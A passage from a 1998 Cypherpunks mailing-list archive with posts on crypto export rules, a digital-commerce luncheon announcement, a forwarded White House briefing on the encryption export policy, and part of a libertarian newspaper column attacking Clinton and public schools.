> > Similarly a PSTN-IP-PSTN interface for voice could give you a static
> > phone number that you could dynamically forward anywhere untraceably.
> 
> 	The LEAs don't like this concept, and one of the provisions of
> the CALEA wiretap stuff is providing tracing of calls forwarded so you can't
> do this....
> 
> 
> -- 
> 	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
> PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Arnold G. Reinhold" <reinhold@world.std.com>
Date: Fri, 18 Sep 1998 07:14:12 +0800
To: Robert Hettinga <dcsb@ai.mit.edu
Subject: Re: Questions for Magaziner?
In-Reply-To: <v04011700b22791ad2d2d@[139.167.130.248]>
Message-ID: <v03130304b227b7401a3a@[24.128.118.53]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:38 AM -0400 9/18/98, Robert Hettinga wrote:
>I spoke at the Electronic Payments Forum here in Boston today, and,
>tomorrow, the keynote for tomorrow's lunch is Ira Magaziner.
...
>
>Anyway, In light of more recent crypto-shenanigans from Billary, and the
>fact that this thing's a small crowd, I figured I'd ask if anyone on these
>lists had a question they wanted me to ask him.
>

One question I'd like asked is whether the US Gov will approve 56-bit RC-4
for export on the same terms as 56-bit DES. That would allow export
versions of web browsers to be upgraded painlessly, making international
e-commerce 64 thousand times more secure than existing 40-bit browsers.
(56-bit DES browsers would require every merchant to upgrade their SSL
servers and introduce a lot of unneeded complexity.)

Arnold Reinhold





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 08:16:50 +0800
To: cypherpunks@cyberpass.net
Subject: DCS-NY Initial Meeting on September 8th
Message-ID: <v04011705b228001b22bb@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "DCS-NY Announcements" <dcs-ny-rsvp@piermont.com>
To: "recipient list suppressed" <perry@piermont.com>
Subject: DCS-NY Initial Meeting on September 8th
Reply-To: perry@piermont.com
Mime-Version: 1.0 (generated by tm-edit 7.108)
Date: 17 Sep 1998 14:05:02 -0400
Lines: 103


[If you know of people who may be interested in this meeting, please
feel free to forward this message to them.]

I am pleased to announce the second luncheon meeting of the Digital
Commerce Society of New York (DCS-NY), to be held on Tuesday, October
13th at 12:00. If you are interested in attending, please RSVP and
send in your check (as explained below) as quickly as possible. We
have relatively little time to make arrangements, and need to have a
solid idea of the number of attendees by Friday the 25th of
September.

This Month's Luncheon Speaker:

 Stuart Feldman, IBM Institute for Advanced Commerce, IBM T.J.
 Watson Research Center

 Topic: Future Directions in Electronic Commerce

 Stuart Feldman will delve into a half dozen major themes for long-term
 research in electronic commerce. These areas will take years to resolve
 at a research level and even longer to achieve full impact in the world
 economy. They include privacy, the evolving marketplace on several time
 scales, the rise of dynamic businesses and electronic haggling, improved
 relationships to customers, and the systems underpinnings needed to
 support the vast new opportunities and capabilities of electronic
 commerce. Stuart Feldman is Director of IBM's Institute for Advanced
 Commerce. The Institute is dedicated to creating new technologies for
 support of e-commerce as well as pursuing fundamental issues in
 e-commerce. He is also the author of the original "make" and "f77."


WHAT IS DCS-NY?

As some of you probably know, Robert Hettinga has been running a group
called the Digital Commerce Society of Boston for over three years.
DCSB meets once a month for lunch at the Harvard Club in Boston to
hear a speaker and discuss the implications of rapidly emerging
internet and cryptographic technologies on finance and commerce --
"Digital Commerce", in short.

The Digital Commerce Society of New York (DCS-NY) is a spin-off of
DCSB.  We intend to meet the second Tuesday of each month for lunch
at the Harvard Club in New York, and conduct meetings much like those
of DCSB. Our organizing meeting in September was attended by a wide
variety of professionals involved in the business, technical and legal
sides of the emerging world of digital commerce.

If you are interested in attending our next luncheon meeting, please
follow the directions located below. If you merely wish to be added to
our e-mail meeting announcements list, you may send your e-mail
address to "dcs-ny-rsvp@piermont.com".


Perry

PS We would like to thank John McCormack for his invaluable assistance in
procuring the venue for our meetings.

----------------------------------------------------------------------

HOW TO RSVP:

The meeting will start at 12:00 noon on October 13th at the Harvard Club,
which located at 27 West 44th St. in Manhattan.

The cost of the luncheon is $49.00.

To RSVP, please:
A) Send a check for $49.00 (payable to "The Harvard Club of New York") to:

	Harry S. Hawk
	DCS-NY LUNCHEON
	Piermont Information Systems, Inc.
	175 Adams St., #9G
	Brooklyn, New York  11201

Please include along with your check:
1) The name of the person attending
2) Their daytime phone number
3) Their e-mail address

B) Send an email message to dcs-ny-rsvp@piermont.com indicating that
you have sent your check, so that we can inform the Harvard Club of
the number of people who will be attending.

Please note that the Harvard Club dress code requires jacket and tie
for men and comparable attire for women.

If you have special dietary requirements, please check with us by
email before you RSVP.

Making final arrangements for our room requires that we have a good
idea of how many attendees we will have. Because of this, it is very
important that you RSVP quickly so that we will be able to get a
larger room if necessary.

We are looking forward to seeing you!

----------------------------------------------------------------------


Perry

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 08:18:55 +0800
To: cypherpunks@cyberpass.net
Subject: THE WHITE HOUSE: Briefing on encryption ( X-files ?? )
Message-ID: <v0401170bb228053d57cd@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: "Blair Anderson" <blair@technologist.com>
To: "Robert Hettinga" <rah@shipwright.com>
Date: Fri, 18 Sep 98 11:07:29 +1300
Reply-To: "Blair Anderson" <blair@technologist.com>
Priority: Normal
MIME-Version: 1.0
Subject: THE WHITE HOUSE: Briefing on encryption ( X-files ?? )

THE WHITE HOUSE: Briefing on encryption

M2 PRESSWIRE-17 September 1998-THE WHITE HOUSE: Office of the Press
Secretary -- Briefing on encryption
(C)1994-98 M2 COMMUNICATIONS LTD

* Briefing by the Vice President, Deputy Chief of Staff John Podesta,
Principal Associate Deputy Attorney General
Robert Litt, Assistant Director of the FBI Carolyn Morris, Under Secretary
of Commerce William Reinsch, Deputy
Secretary of Defense John Hamre, and Deputy National Security Advisor Jim
Steinberg

* The Briefing Room

THE VICE PRESIDENT: Good morning. While my colleagues are coming in here,
let me acknowledge them. John
Podesta is going to take over the podium after I complete my statement, and
he is joined by Bob Litt of the Justice
Department, Bill Reinsch of the Commerce Department -- Under Secretary for
the Export Administration -- and John
Hamre, Deputy Secretary of Defense.

I also want to acknowledge Carolyn Morris of the FBI; Barbara McNamara of
the National Security Agency; John
Gordon, Deputy Director of the CIA. And you all should know that this
process, the results of -- the interim results of
which I'm announcing here, is a process that has been run principally by
John Podesta and Jim Steinberg, Deputy at the
National Security Council. And I also want to thank Sally Katzen at the NEC
and David Beier on my staff for the work
that they and many others have done on this.

Some of you who have followed this issue know that it is probably one of
the single, most difficult and complex issues
that you can possibly imagine. But we've made progress, and we're here this
morning to announce an important new
action that will protect our national security and our safety, and advance
our economic interests and safeguard our basic
rights and values in this new Information Age.

The Information Age has brought us the Internet, an inter-connected global
economy and the promise of connecting us
all to the same vast world of knowledge. But with that exciting promise
comes new challenges. We must make sure that
in the Information Age you get information about the rest of the world and
not the other way around. We must ensure
that new technology does not mean new and sophisticated criminal and
terrorist activity which leaves law enforcement
outmatched -- we can't allow that to happen. And we must ensure that the
sensitive financial and business transactions
that now cruise along the information superhighway are 100 percent safe in
cyberspace.

Balancing these needs is no simple task, to say the least. That is why, in
taking the next step toward meeting these
complex goals, we worked very closely with members of Congress from both
parties, House and Senate; with industry;
with our law enforcement community and with our national security
community. And as we move forward we want to
keep working closely with all who share a stake in this issue -- especially
law enforcement -- to constantly assess and
reassess the effectiveness of our actions in this fast changing medium.

Today I'm pleased to announce a new federal policy for the encryption and
protection of electronic communication, a
policy that dramatically increases privacy and security for families and
businesses without endangering out national
security.

Beginning today, American companies will be able to use encryption programs
of unlimited strength when
communicating between most countries. Health, medical, and insurance
companies will be able to use far stronger
electronic protection for personal records and information. Law enforcement
will still have access to criminally-related
information under strict and appropriate legal procedures. And we will
maintain our full ability to fight terrorism and
monitor terrorist activity that poses a grave danger to American citizens.

With this new announcement, we will protect the privacy of average
Americans, because privacy is a basic value in the
Information Age, indeed in any age. We will give industry the full
protection that it needs to enable electronic
commerce to grow and to thrive. And we will give law enforcement the
ability to fight 21st century crimes with 21st
century technology, so our families and businesses are safe, but on-line
outlaws are not safe.

In just a moment you will hear more of the details of this new policy, but
I want to conclude by saying that this policy
does reflect one of the greatest challenges of these new times. And to
state it broadly, it's a challenge of how we can
harness powerful new technology while protecting our oldest and most
cherished values, such as privacy and safety.

I'm grateful to those who have worked so hard to reach this balance. And
with today's announcement I believe that all
families and businesses have reason to feel safer, more secure and more
confident as we approach the 21st century.

And now I'd like to turn things over to White House Deputy Chief of Staff
John Podesta.

Q Mr. Vice President, before you go, can you tell us what you say to
Democratic lawmakers who say the President
ought to resign?

THE VICE PRESIDENT: I disagree.

Q How about the release of that tape? What do you think --

THE VICE PRESIDENT: The President is going to have a press conference
shortly and I'm sure that you will not miss
the opportunity at this national security press conference with the leader
of a foreign country to raise all these questions.

Q What about the videotape, should it be released?

Q It was staged by the White House -- you know that, don't you?

MR. PODESTA: Guess what? I'm here to talk about encryption. Okay. I can see
the front row leaving here. (Laughter.)
As the Vice President noted, Jim Steinberg and I have co-chaired our
process in this matter. I volunteered for that duty
because of my well-known fascination with The X Files, which most of you
know about.

As you know, this is an important and challenging issue that affects many
of our interests in our society. And over the
past year we've promoted a balanced approach to the issue, working with all
segments of our government and working
with industry to find a policy that promotes electronic commerce, preserves
privacy, protects national security and law
enforcement interests, and permits U.S. industry to secure global markets.

Recognizing the importance of moving this issue forward, last March the
Vice President asked us to intensify our
dialogue with U.S. industry, to bring industry's technical expertise to
bear on this issue with the hope of finding more
innovative ways that we might assist law enforcement. We appreciate the
efforts of Congress, the law enforcement
community and particularly the industry groups.

I would note the Computer Systems Policy Project and the Americans for
Computer Privacy, who have been in an
intensive dialogue with us over the past many months to foster an
environment that has allowed us to come up with a
policy which we believe has balanced the elements that are necessary in
this regard.

I think all the stakeholders in this process, on our side, as well as on
private industry's side, now have a greater
appreciation of the issues and intend to continue the dialogue, which I
think we're most pleased by. Again, I think some
of the people here from industry will be available at the stakeout later to
take some comment.

Based on the ideas discussed among the various stakeholders, today we're
proposing an update to our policies that
we've announced in the past. I'm going to serve kind of as M.C. We're going
to start off with Bob Litt from the Justice
Department and Carol Morris, who I asked to join us, from the FBI, to talk
about the law enforcement-FBI concerns.
Then we're going to turn to Bill Reinsch from the Commerce Department to
talk about export control and electronic
commerce. And finally you'll hear from Dr. Hamre from the Defense
Department. I might ask Jim also to join us up
here.

Before I give up the floor to Bob and Carol, though, I want to stress that
encryption policy is an ongoing process. It's
one of adaptation; it's an evolutionary process. We intend to continue the
dialogue, and over the course of the next
year, determine what further updates are necessary as we work with industry
to try to, again, come up with a policy that
balances national security, law enforcement, and the real needs for privacy
and security in electronic commerce.

Thank you. Let me turn it over to Bob.

MR. LITT: Thank you, John. Good afternoon. The Justice Department and the
FBI and law enforcement in general is
supportive, very supportive of today's announcement on the updating of our
export controls on encryption products,
particularly with respect to those products that allow law enforcement to
obtain lawful access to the plain text of
encrypted information.

We have been very encouraged over the last few months by industry's efforts
to work with us to develop and market
strong encryption products that provide law-abiding citizens with the
ability to protect the privacy of their
communications and their electronically-stored data, while at the same time
maintaining law enforcement's ability to
ensure public safety when these products, when they become commercially
available, are used in furtherance of
serious criminal activity.

Our goal is through whatever means to ensure that when we have the lawful
authority to take steps to protect public
safety, we have the ability to do so. And we have been working
cooperatively with industry for many months to
develop approaches that will deal with that.

Carolyn Morris will now talk a little bit about the technical support
center that is being proposed.

MS. MORRIS: Thank you very much, Bob.

Good afternoon, ladies and gentlemen. We in federal, state, and local law
enforcement, are pleased with the
administration's support to establish a technical support center. This
center will provide federal, state, and local law
enforcement with the resources and the technical capabilities we need to
fulfill our investigative responsibilities.

In light of strong, commercially available encryption products that are
being proliferated within the United States, and
when such products are used in the furtherance of serious criminal
activity, this center becomes very, very critical to
solving the encryption issues that we need to make cases. As a matter of
fact, the FBI has already begun planning
activities of this critical technical support center in anticipation of the
availability of funds.

The United States federal, local and state law enforcement community looks
forward to a cooperative partnership with
American industry, the Congress and the administration to ensure that this
technical support center becomes a reality in
the near future. With this center the American people can be assured that
federal, state, and local law enforcement has
the necessary resources and tools we need to fulfill our public safety
mission.

Thank you very much.

UNDER SECRETARY REINSCH: With respect to export controls, the
administration is updating its policy in three
areas: Our existing policy and some revisions there, an expansion with
respect to certain sectors, and an expansion with
respect to so-called recoverable products. And let me address each of these
separately. In keeping with the
administration's reinvention initiatives, I'm going to try to do it in
plain language -- or plain English, So that those of you
that speak the vocabulary of encryption may find it to elementary, but we
can go back and do it again in another
language, if you want, later on in questions.

With respect to our existing policy, we have for two years ending this
December, permitted the export of 56-bit
products after an initial one-time review without further review by the
government. What we're announcing today is the
maintenance of that window permanently. And so 56-bit products will be
freed from export controls after a one-time
review, in perpetuity, not ending at the end of this year. We are, however,
removing the requirement for key recovery
plans or key recovery commitments to be provided in return for that change,
which was the initial condition that we
extracted.

In addition, we are continuing to permit the export of key recovery
products -- products that contain those features --
without restraint worldwide. We are, however, going to simplify
significantly our regulations that relate to those
exports. In particular, we're going to eliminate the need for six-month
progress reports for the plans that have been
submitted, and we're going to eliminate the requirement for any prior
reporting of key recovery agent information. For
those of you that follow the regulations in detail, that means we're going
to eliminate Supplement Five of our
regulations on these matters.

Now, with respect to sectors, we're making some new innovations in four
areas. Some of you may be familiar with the
fact that some time ago we announced expanded treatment of encryption
products for export to banks and financial
institutions. And what we did at that time, briefly, was to permit the
export of encryption products of any length, any bit
length, with or without key recovery features to banks and financial
institutions in a list of 45 countries.

What we are announcing today is, first, that we are adding insurance
companies to the definition of financial institutions,
so insurance companies will be treated the same way under this policy as
banks and other financial institutions are now.
In addition, we are providing the same kind of treatment for exports of
these encryption products to the health and
medical sector operating in the same set of countries. We are excluding
from that biochemical and pharmaceutical
producers. But the rest of the health and medical sector will be the
beneficiary of the same kind of treatment.

In addition, we are providing also this expanded treatment for that country
group to on-line merchants that are operating
in those countries. That means that for products that are like
client-server applications, like SSL, will be able to be
exported to those destinations.

All these things will take place under what we call license exception,
which means after initial one-time review to
determine whether or not your product is, in fact, what you say it is, they
can then go without any further review or
intervention by the government to those locations. In addition, there is
always the option in the export control system of
coming in with an application to export these kinds of products to other
destinations beyond the ones that I'm talking
about right now, and those will be reviewed one by one on their merits.

Finally, with respect to what we have come to refer to as a class of
so-called recovery capable or recoverable products,
and these are the products that, among others, include what has become
known as the doorbell products, which are
products that, among other things, will deal with the development of local
area or wide area networks and the
transmission of e-mail and other data over networks -- we are going to
permit the export of those products under a
presumption of approval and an export licensing arrangement to a list of 42
countries. And within those countries we are
going to permit that export to commercial firms only within those
countries. And both in that case and in the case of the
on-line merchants that I referred to a few minutes ago, we are going to
exclude manufacturers or distributors of
munitions items, I think for obvious reasons.

We can go into further details later, if you would like. I think for those
of you that are interested in the nitty-gritty of all
this stuff, BXA intends to post all the details, including the country
lists, on its website and we should have that up later
today.

Thank you.

DEPUTY SECRETARY HAMRE: Good morning. I'm here to speak on behalf of the
national security community. I'm
joined today by my enormously capable counterparts and colleagues, Deputy
Director Barbara McNamara for the
National Security Agency; and Deputy Director John Gordon from the Central
Intelligence Agency.

The national security establishment strongly supports this step forward. We
think this is a very important advance in a
crucial area for our security in the future.

We in DOD had four goals when we entered these discussions. First was to
strengthen our ability to do electronic
commerce. We're the largest company in the world. Every month we write
about 10 million paychecks. We write about
800,000 travel vouchers. One of our finance centers disburses $45 million
an hour. We are a major, major force in
business. And for that reason, we can't be efficient unless we can become
fully electronic, and electronic commerce is
essential for us. And this is an enormous step forward.

Second, we must have strong encryption and a security structure for that in
order to protect ourselves in cyberspace.
Many of you know that we have experienced a number of cyber attacks during
the last year. This will undoubtedly
increase in the future. We need to have strong encryption because we're
operating over public networks; 95 percent of
all of our communications now go over public infrastructure -- public
telephone lines, telephone switches, computer
systems, et cetera. To protect ourselves in that public environment, we
must have encryption and we must have a key
recovery system for ourselves.

The third goal that we had was to help protect America's infrastructure.
One of the emerging national security
challenges of the next decade is to protect this country, the homeland
defense of this country, against attack. We must
have strong encryption in order to do that, because most of this
infrastructure now is being managed through distributed
computer-based management systems, and this is an important step forward.

Finally, it is very important that the Department of Defense and our
colleagues in the national security establishment
have the ability to prosecute our national security interests overseas.
Terrorists and rogue nations are increasingly using
these tools to communicate with each other and to lay their plans. We must
have the ability to deal with that. And so this
policy, it's a balanced and structured approach to be able to deal with all
four of those problems.

UNDER SECRETARY REINSCH: I apologize -- in listing my changes, I neglected
one very important item that I want
to go back to, and that is, in the sector area we are also announcing today
the ability to export strong encryption of any
bit length, with or without key recovery features, to subsidiaries of U.S.
companies to all destinations in the world with
the exception of the seven terrorist nations.

MR. PODESTA: Okay, I think we're happy to take your questions now. If you
could identify whom you're addressing,
because there is a variety of expertise. And I would like to introduce one
other person, Charlotte Knepper from the
NSC staff, who has been instrumental in pulling this all together.

Q John, this is a question for you. In October '96 and other White House
statements on encryption, there has usually
been a line also addressing the domestic side, saying that all Americans
remain free to use any strength encryption. I
didn't notice anything like that in today's announcement. Are there any
conditions under which the White House would
back domestic restrictions on encryption?

MR. PODESTA: We haven't changed our policy, and the previous statements are
certainly intact. We have made a
number of policy statements in the past, since this administration came
into office, and I think that you should view this
as a step forward, building on the policies that we have put before the
American public in the past.

Q John, could I ask you one question about an un-encrypted matter?

MR. PODESTA: Maybe. (Laughter.)

Q Democrats on the Hill are now saying, and John Kerry is saying that the
President's actions absolutely call for some
sort of punishment. What are Democrats telling you about what they feel
must be done at this point?

MR. PODESTA: Well, I think I'm not going to stand here and take a lot of
questions, but I'm going to give special
dispensation, as a Catholic, today -- which is I'm going to return your
phone calls later. But in deference to the people
up here I think we'll handle it that way.

But in specific response, I'll take one, which is that I think that we had
a number of productive meetings with
Democrats on both sides of the Hill yesterday. They view the President as a
person who has led on the issues that are
important to them, and I think what they want to do is get back to having
him speak out and be a leader on the issues of
education and the health care bill of rights, on saving Social Security.
And I think they pointed at that and wanted to
work with us on that.

I think with regard to the question that you posed with regard to Senator
Kerry, I think that's a matter that they are
debating amongst themselves more than they are debating with the White
House. I think it's probably presumptuous for
us at this point to offer them assistance or guidance. I mean, the
President has said that what he has done was wrong;
he's apologized for it; he's asked for forgiveness. He is moving forward.
And I think that this debate is going on, on
Capitol Hill, but it's largely going on amongst members themselves.

Q We haven't heard many of them say they want to get back to the work at hand.

MR. STEINBERG: You heard John, and I'm going to leave it there.

Let me just add a word in response, in connection with the domestic
controls issue. I think one of the lessons that we've
learned from this exercise is that -- actually, two lessons -- one, that
trying to balance the various interests and equities
in this is much less of a zero sum gain than I think some began to look at
the question. That is, you heard from Dr.
Hamre and others that many of the interests involved have common interests
in making sure that we have secure and
effective means of dealing with communications and stored data.

And so we found, by looking in a very pragmatic way, that there were ways
to solve these problems without very, kind
of, broad-based solutions. In particular, I think the idea that there's no
one-size-fits-all answer to the problems of
meeting the various needs informs the decisions that we reached -- that
there are a variety of different techniques that
respond to the different aspects of the industry, the different aspects of
the technology. I think that's what made the
progress possible today, is that industry, agencies and Congress sat down
together, pulled the problem apart, began to
look at its different components and began to fashion very pragmatic
solutions.

And so I think we came to this discussion with a spirit of not looking for
a kind of single or simple solution to the
problem but, rather, how do you tackle and meet the various needs. And I
think that's what led to this resolve.

Q Could you talk a little more about the on-line merchants part of it? I
mean, what do you have to do to qualify as an
on-line merchant? Do you have to register or can anybody sort of set
themselves up in business?

UNDER SECRETARY REINSCH: I think the simplest way to respond to that right
now is we'll have a definition in the
reg that will be very clear as to what the criteria are for qualification.
And those definitions have already been dealt with
and agreed to, so we should have them up on the web site this afternoon.

Q A question for Bill Reinsch. How do you handle, then, 128-bit, to which
the Department has given export -- or has
allowed to be exported after going through this review? Will 128 or things
above 56-bit, will they require a license or
will they still have to go through plans --

UNDER SECRETARY REINSCH: Well, with respect to the subsidiaries, the health
sector, the banks, the financial
institutions, the insurance companies, the on-line merchants, and the
recoverable products as in the universe defined --
no. In the case of all but the recoverable products, they will all go on
license exception, which means one-time review
and then out the door. With respect to recoverable products, they will come
in and go out pursuant to an export
licensing arrangement, where we'll have to do a little tailoring depending
upon the nature of the product. But there is a
presumption of approval for the 42 countries that I indicated.

And that's without reference to bit length -- 128 or more is all covered by
that. Now, if you want to export an 128-bit
product that is beyond any of those universes, then you would have to come
in for an individual license application.

Q A question for Mr. Litt. With regard to the technical support center,
when do you expect that to be in operation?

MR. LITT: I don't think we have a specific timetable yet. Obviously, it
would be helpful for us to have it up and
operational as soon as possible, but there are planning and budgetary
issues that have to be dealt with.

Q This is probably a question for Under Secretary Reinsch. The export
exceptions now are essentially going to U.S.
subsidiaries -- foreign subsidiaries of U.S. companies. I was wondering,
could you be a little more specific -- what size
company, what kind of company will be allowed to export powerful crypto to
its foreign subsidiaries?

UNDER SECRETARY REINSCH: That doesn't make any difference. The universe is
determined by the end user, not
by the nature of the American company. But it is not -- while part of this
relates to subsidiaries of U.S. companies, that is
correct, we also intend, on a case-by-case basis, to provide for favorable
treatment for export of the same kind of thing
to strategic partners of U.S. companies -- those foreign companies that are
engaged in a closer, say, joint venture, that
kind of relationship.

Well, I think that's it.

Q What about foreign companies that have U.S. subsidiaries, like Seaman's
or -- or Chrysler -- can they get this
encryption?

UNDER SECRETARY REINSCH: Well, keep in mind, there are multiple universes
here. If you're talking about the
financial institutions, the banks and the insurance companies, those aren't
necessarily American financial institutions.
That's for export to any financial institution, and for their use in any of
their branches, aside from the terrorist countries.
This is true for the health sector; this is true for on-line merchants as
well. Those are not restricted to U.S. companies.

Obviously, if we're going to have a requirement for U.S. subs, it relates
to U.S. subs, and wouldn't affect the examples
you've described. Now, with respect to recoverable products, which actually
is one of the areas where the companies
you mentioned would probably be looking because they'd be looking to build
a network among their various offices,
affiliates of subsidiaries, dealers if necessary, worldwide, the
recoverable provisions that I described could be exported
to those companies within the territorial universe I described -- the 42
countries.

Thank you very much.
Blair Anderson  (Blair@technologist.com)

International Consultant in Electronic Commerce,
Encryption and Electronic Rights Management

   "Techno Junk and Grey Matter"  (HTTP://WWW.NOW.CO.NZ [moving servers,
currently inactive])
   50 Wainoni Road, Christchurch, New Zealand

          phone 64 3 3894065
          fax     64 3 3894065

Member 	Digital Commerce Society of Boston

---------------------------- Caught in the Net for 25 years
----------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 18 Sep 1998 08:22:13 +0800
To: cypherpunks@cyberpass.net
Subject: Sept. 19 column - Clintonites reject reality
Message-ID: <v04011713b2280736ce8f@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Thu, 17 Sep 1998 23:24:28 -0600
Date: Thu, 17 Sep 1998 22:23:36 -0700 (PDT)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Sept. 19 column - Clintonites reject reality
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/557
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED SEPT. 19, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    It's the government schools, stupid

    Bill Clinton is a fake. As many Americans who had been taken in by him
looked on in wide-eyed horror on Sept. 10 and 11, 1998, this emotionally
hollow creature tried again and again to mimic precisely the right catch in
the voice, precisely the right words, the wiping away of a tear at just the
right moment, in what quickly became known as the Monica Lewinsky
"Apology-thon."

  Just as our penultimate national office manager, George Bush, spoke with
an impatient lack of comprehension about "the vision thing" folks seemed to
want from him, so does Bill Clinton fail to understand the horror with
which it is finally sinking in to about 35 percent of the American populace
that this man (start ital)has(end ital) no core emotions ... he has merely
been miming them all these years.

  But what should really frighten us is not the fact that Bill Clinton is
thus revealed to be the moral and emotional equivalent of one of those
human-looking androids in the science fictions movies, unmasked in a
now-familiar scene in which they begin to stutter and shudder, and finally
go cartwheeling around the spacecraft spewing white hydraulic fluid.

  No, what should frighten us is that only 35 percent of Americans seem to
care. Sixty-five percent say: "So what? All that moral and emotional stuff
is so much make-believe, anyway. Doesn't everybody lie? Doesn't everybody
fake it?"

  Where did this race of pod people come from?

  From the government schools, stupid.

  For years, folks have been dismissing the direst of warnings about the
"public schooling" scam with exasperated disbelief.

  Schools don't fight duplicity, cheating, drug use, and scorn for
achievement, argued New York State Teacher of the Year John Taylor Gatto in
his slim but estimable little volume "Dumbing Us Down" ($12.45, New Society
Publishers, 4527 Springfield Ave., Philadelphia 19143.) Instead, Mr. Gatto
discovered after a lengthy and distinguished career, these things are what
the schools actually (start ital)teach(end ital).

  "Put kids in a class and they will live out their lives in an invisible
cage, isolated from their chance at community," Gatto warns. "Interrupt
kids with bells and horns all the time and they will learn that nothing is
important; force them to plead for the natural right to the toilet and they
will become liars and toadies; ridicule them and they will retreat from
human association; shame them and they will find a hundred ways to get
even" through exactly the kind of addictive, immature and dependent
pathologies we expect from any inmates -- drugs, violence, random sex.


    #  #  #

  What caused his teachers to praise someone like the young Bill Clinton,
who didn't just dodge the physical risks of Vietnam, but who (as some are
only now discovering) apparently avoided all the emotional risks and
commitments which help a boy mature into a man, leaving a 50-year-old
president at the approximate level of emotional development of a giggling,
groping 13-year-old, promising to "marry" his date to the sock hop if
she'll let him cop a feel?

  Apparently no one believes Mr. Gatto. But the great novelist and
philosopher Ayn Rand further explained the process by which children's
normal mental and emotional development are now systematically and
deliberately crippled in a 1970 essay called "The Comprachicos," available
in the Meridian paperback "The New Left:"

  "At the age of three, when his mind is almost as plastic as his bones,
when his need and desire to know are more intense than they will ever be
again, a child is delivered -- by a Progressive nursery school -- into the
midst of a pack of children as helplessly ignorant as himself. ... He wants
to learn; he is told to play. Why? No answer is given. He is made to
understand -- by the emotional vibrations permeating the atmosphere of the
place ... that the most important thing in this peculiar world is not to
know, but to get along with the pack. Why? No answer is given.

  "He does not know what to do; he is told to do anything he feels like. He
picks up a toy; it is snatched away from him by another child; he is told
that he must learn to share. Why? No answer is given. He sits alone in a
corner; he is told that he must join the others. Why? No answer is given.
He approaches a group, reaches for their toys and is punched in the nose.
He cries, in angry bewilderment; the teacher throws her arms around him and
gushes that she loves him. ...

  "The teacher's mechanical crib-side manner -- the rigid smile, the cooing
tone of voice ... the coldly unfocused, unseeing eyes -- add up in the
child's mind to a word he will soon learn: phony. He knows it is a
disguise; a disguise hides something; he experiences suspicion -- and fear.

  "A small child is mildly curious about, but not greatly interested in,
other children of his own age. In daily association, they merely bewilder
him. He is not seeking equals, but cognitive superiors, people who (start
ital)know(end ital). Observe that young children prefer the company of
older children or of adults, that they hero-worship and try to emulate an
older brother or sister. A child needs to reach a certain development, a
sense of his own identity, before he can enjoy the company of his 'peers.'
But he is thrown into their midst and told to adjust.

 "Adjust to (start ital)what?(end ital) To anything. To cruelty, to
injustice, to blindness, to silliness, to pretentiousness, to snubs, to
mockery, to treachery, to lies ... and to the overwhelming , overpowering
presence of Whim as the ruler of everything. ...

  "After a while, he adjusts. ... He learns that regardless of what he does
-- whether his action is right or wrong, honest or dishonest, sensible or
senseless -- if the pack disapproves, he is wrong and his desire is
frustrated; if the pack approves, then anything goes. Thus the embryo of
his concept of morality shrivels before it is born," and is replaced with
the realization that the objective reality of achievement is worthless,
that everything of value is instead gained through the emotional
manipulation of the pack, Ms. Rand explained.

  "Cut off from reality, which he has not learned fully to grasp, he is
plunged into a world of fantasy playing. He may feel a dim uneasiness, at
first: to him, it is not imagining, it is lying. But he loses that
distinction and get into the swing. The wilder his fantasies, the warmer
the teacher's approval and concern. ... He begins to believe his own
fantasies. ... Why bother facing problems if they can be solved by
make-believe? ...

  "The teacher prods him to self-expression, but he knows that this is a
trap; he is being put on trial before the pack, to see whether he fits or
not. He senses that he is constantly expected to feel, but he does not feel
anything -- only fear, confusion, helplessness and boredom. ...

  "So he learns to hide his feelings, to simulate them, to pretend, to
evade -- to repress. The stronger his fear, the more aggressive his
behavior; the more uncertain his assertions, the louder his voice. From
playacting, he progresses easily to the skill of putting on an act. ... He
cannot know by what imperceptible steps he, too, has become a phony."


    #   #   #

  Is it really so hard to see how an "education" system that grades
children on group projects and "how they fit in with others," that flatters
them that all their uninformed opinions are equally, indiscriminately
worthy of "discussion groups," that rejects the tried and true practice of
encouraging the majority to aspire to match the achievements of the best
and the brightest, instead naming (start ital)every(end ital) child
"Student of the Month," could end up producing a Bill Clinton ... or 100
million Bill Clintons? Is it really any surprise that two whole American
generations are now schooled not in math, spelling, and grammar, but rather
in fantasy, deception, and manipulation?

  Can we really be surprised that they ignore evidence that the garbage men
pour all their sorted trash into the same trucks, insisting the exercise of
sorting green bottles from brown is still worthwhile if it "raises
everyone's consciousness"? That they snort at statistics proving cities
with gun bans actually have the highest rates of crime, or that one volcano
